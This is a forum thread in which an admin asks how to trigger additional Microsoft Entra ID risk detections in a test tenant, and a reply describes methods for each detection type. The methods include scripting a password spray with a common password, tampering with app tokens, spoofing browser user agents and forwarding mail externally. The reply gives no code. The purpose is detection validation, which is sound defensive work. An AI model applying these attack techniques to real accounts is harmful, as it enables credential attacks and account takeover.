Forum Discussion

nikunjbhatt_cds's avatar
nikunjbhatt_cds
Copper Contributor
Mar 11, 2025

Generating Additional riskEventType Events in Microsoft EntraID

Hello,

We are using Simulated Risk Detections to test specific riskEventType detections based on Microsoft's documentation:

Reference: https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-simulate-risk

So far, we have successfully simulated the following risk detections:

  • Anonymous IP address
  • Unfamiliar sign-in properties
  • Atypical travel 
  • Leaked credentials in GitHub for workload identities 

However, the documentation states that other risk detections cannot be simulated in a secure manner.

We are looking for guidance on how to generate events for additional riskEventType detections in a controlled environment.Has anyone successfully tested or triggered these risk detections for security research or validation purposes? Any insights, best practices, or alternative approaches would be greatly appreciated.

Thanks!

1 Reply

  • Joe Stocker's avatar
    Joe Stocker
    Bronze Contributor

    Admin confirmed user compromised (adminConfirmedUserCompromised):
    Sign in to the Microsoft Entra admin center with an account that has at least Security Administrator privileges. Navigate to Protection > Identity Protection > Risky Users, select a test user account, and manually mark the user as compromised by selecting "Confirm user compromised" from the available actions. This action will trigger the adminConfirmedUserCompromised detection, which should appear in the Risk Detections report shortly after.

    Anomalous Token (sign-in) (anomalousToken):
    To simulate this, generate a token for a test application in Entra ID by registering an app under Identity > Applications > App registrations, then create a client secret. Use the token in a way that deviates from normal behavior, such as signing in from a completely different device or IP address immediately after generating it, or attempting to use the token after modifying its properties (e.g., altering the token’s audience field if you have the technical capability). This may require scripting with tools like Postman to make API calls. Monitor the Risk Detections report for the anomalousToken event, which may take up to 48 hours to appear if detected offline.

    Password Spray (passwordSpray): Use a script (e.g., PowerShell or a custom tool) to perform multiple login attempts with a common password (e.g., "Password123") across several test accounts in a controlled Entra ID tenant, ensuring the attempts are spaced out to mimic a real password spray attack.

    Suspicious browser (suspiciousBrowser): Simulate a sign-in from a test account using an outdated browser (e.g., Internet Explorer 8) or modify the user agent string to mimic a known malicious browser, then monitor Entra ID for the detection trigger.
    Suspicious inbox forwarding (suspiciousInboxForwarding): Set up an email forwarding rule to an external address and perform actions that might look suspicious (e.g., forwarding sensitive emails).

    Mass Access to Sensitive Files (mcasFinSuspiciousFileAccess): Use a test account to download or access a large number of files flagged as sensitive in Defender for Cloud Apps.

    User reported suspicious activity (userReportedSuspiciousActivity): Entra ID allows users to report suspicious activity via the "Report a problem" feature in the sign-in flow. You could test this by having a user report their own sign-in as suspicious.

    For detections that involve machine learning (e.g., unfamiliarFeatures, anomalousUserActivity), establishing a baseline of normal behavior for the test account (e.g., consistent sign-in locations, devices, and times) before introducing anomalies can increase the likelihood of triggering the detection.

    Some detections, like Malicious IP address (maliciousIPAddress) or Verified threat actor IP (nationStateIP), cannot be simulated practically because they rely on Microsoft’s proprietary threat intelligence to flag specific IPs as malicious or tied to nation-state actors. Simulating these would require using an IP that Microsoft has already flagged, which isn’t feasible or ethical in a test environment.

    Detections like Microsoft Entra threat intelligence (investigationsThreatIntelligence) or Anomalous user activity (anomalousUserActivity) depend on machine learning models and Microsoft’s internal data, making them difficult to simulate without knowing the exact triggers or having access to Microsoft’s backend logic.



Resources